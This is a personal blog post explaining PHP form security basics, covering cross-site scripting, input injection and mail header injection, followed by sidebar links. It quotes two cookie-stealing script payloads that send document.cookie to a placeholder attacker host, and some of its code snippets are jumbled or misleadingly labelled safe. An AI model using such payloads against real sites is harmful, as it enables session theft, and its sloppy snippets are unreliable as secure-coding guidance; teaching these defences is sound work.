HTML, JavaScript and PHP form security
How about a refresher on PHP form security? Follow these simple steps to cover the basics. Then sleep better at night knowing you have improved the World Wide Web. (Seriously, get some good sleep, you need it.)
Know thy enemy
The whole security issue comes from two simple facts:
- First fact: Certain text characters and series of characters have special meaning in programming.
Example: A left angle bracket, in HTML context, starts a tag. But in JavaScript, it means less than. - Second fact: Web sites implement online forms that let users upload code to run on the server.
Example: In the comments form, users type text in various text fields. But is the user entering just plain text and allowed tags, or are they entering carefully crafted text containing HTML, JavaScript or some other language meant to run malicious code either on your server or in another user's browser (while visiting your site)?
Malicious client-side HTML and JavaScript
A left angle bracket, in HTML, starts an HTML tag. The series of characters <script> starts a script tag. If you allow a user to submit html tags in your form, you have just opened the door to attack. For example, here is a common type of attack where the attacker posts a malicious link as part of their message or comment to the target Web site. The following example uses HTML and JavaScript entered in the message body. Any cookies you set for that user (who clicks the link) can be read by the attacker. When a user clicks the link, the browser passes the user's cookie information, from the current Web site (yours), as a query string to their PHP file on the attacker's server:
<a href="http://badsite/attacker.php?cookie=<script>document.cookie;</script>">Click here to win</a>
Of course, if you do not filter out or sanitize the data in any way and allow JavaScript code to run, the attacker wouldn't even need the user to click a link. They would just enter a simple block of JavaScript within a <script> tag in their comment:
Hi, great site! <script>location="http://badsite.com/attacker.php?cookie="+document.cookie;</script>
Now we've seen a client-side attack using HTML, JavaScript and PHP. Let's look at a server side attack example, then we'll see how to combat both of them.
Malicious server-side PHP
By adding \r\n in a field that will be used to create an email header for the PHP mail() function, an attacker can write their own email and send it from your Website to whomever they want. Your site's online email form will be used to spam other people. Only these versions of PHP are affected, PHP 4 <= 4.4.6 and PHP 5 <= 5.2.
The local-part of the e-mail address may use any of these ASCII characters:
- Uppercase and lowercase English letters (a-z, A-Z)
- Digits
0through9 - Characters
! # $ % & ' * + - / = ? ^ _ ` { | } ~ - Character
.provided that it is not the first nor last character, nor may it appear two or more times consecutively.
-
// copy the value form $_GET to $id
-
$id = $_GET['id'];
-
echo "thanks for sending me $id, dude!";
-
-
// just use the $_GET val directly
-
echo 'it\'s even more awesome to grab '.$_GET['id'].' directly from input, right?';
-
// escaped, so not a potential SQL injection threat.
-
$id = mysql_real_escape_string($_GET['id']);
-
echo "Now I know that $id is totally safe to insert into my database";
-
-
// cast as int, so
-
$id = intval($_GET['id']);
-
echo "$id is most certainly an integer now";
Ninja Webmaster Techniques
- Encode using htmlentities()
- Strip suspicious special characters like backslashes and curly braces
HTML and JavaScript InjectionPHP mail() Header Vulnerabilities
- Cross site scripting (XSS)
Example: Adding a script tag in a comment on your site to read your user's cookies. - Input injection
Example: Adding malicious PHP code in your form field then submitting to run on your server. - Mail header injection
Example: Adding \r\n in an email form field and then adding custom malicious email headers to send spam from your Website.
Disclaimer
I am not a security professional. I am a Web developer, like you. I presented common best practices. In addition, you should have a professional hosting service or server administrator who knows what they are doing, and you should communicate with them and follow their advice to make sure your Web site is as secure as possible.
Recommendations, resume, contact info
Recent Posts
Categories
- Family News (17)
- Geek Out (44)
- I was recently asked (4)
- Random Topics (6)
- Songs (13)
- Stuff I Like (8)
Pages
Site links
Recent Coments
Recent photos
Quotes Good and Bad
Any sufficiently advanced technology is indistinguishable from magic.
— , http://en.wikipedia.org/wiki/Clarke%27s_three_laws
Lifestream
-
Reviewed Amarcord.
-
Queued Portlandia.
-
Queued Soul Eater.
-
Queued Jajantaram Mamantaram.
-
Queued Night Watch.
-
Queued The Doom Generation.
-
Queued Ip Man.
-
Queued Freakonomics.
-
Queued Macbeth.
-
Queued Middlemarch.
Blogroll
- James.Hafner blog He’s a Joomla guy
- Lolight Design blog Aaron Deckler, designer dude
- Mercy Punch A mercy punch delivers peace by releaving a distressed person of their consciousness for a few minutes. Very effective in the short term.
- Personal budget news Personal budget news
- Yvonne Lim My wife’s blog. Wanna see pics of my son? This is the place.
Related sites
- Asian Austin – Webzine Asian-related news and events, hot spots and people in Austin, TX.
- Elastik Pixel Media – Web design and development Professional Web design and development.
- Golden Star Cafe Chinese, Tex Mex and Americana Cuisine
- Pearl necklace video showing pearl necklace
About Me
